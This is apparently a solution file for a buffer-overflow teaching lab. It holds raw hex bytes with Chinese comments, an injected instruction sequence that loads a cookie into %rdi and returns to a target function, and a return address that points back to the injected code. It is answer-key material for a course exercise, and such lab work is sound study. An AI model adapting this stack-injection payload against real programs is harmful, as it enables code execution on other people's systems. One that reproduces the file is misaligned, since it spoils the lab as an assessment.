00 00 00 00 00 00 00 00  /* <- 当前地址为 0x5561dc78 - 0x5561dc7f */
00 00 00 00 00 00 00 00  /* <- 当前地址为 0x5561dc80 - 0x5561dc87 */
00 00 00 00 00 00 00 00  /* <- 当前地址为 0x5561dc88 - 0x5561dc8f */
68 ec 17 40 00 48 c7 c7  /* <- 当前地址为 0x5561dc90 - 0x5561dc97 */
fa 97 b9 59 c3 00 00 00  /* <- 当前地址为 0x5561dc98 - 0x5561dc9f */
90 dc 61 55 00 00 00 00  /* 调用函数call之后的下一条指令位置存在这里 RET返回之后会吧该值POP 赋给PC 然后跳到该地址执行




/*
 * 0:	68 ec 17 40 00       	push   $0x4017ec
 * 5:	48 c7 c7 fa 97 b9 59 	mov    $0x59b997fa,%rdi
 * c:	c3                   	ret
 */






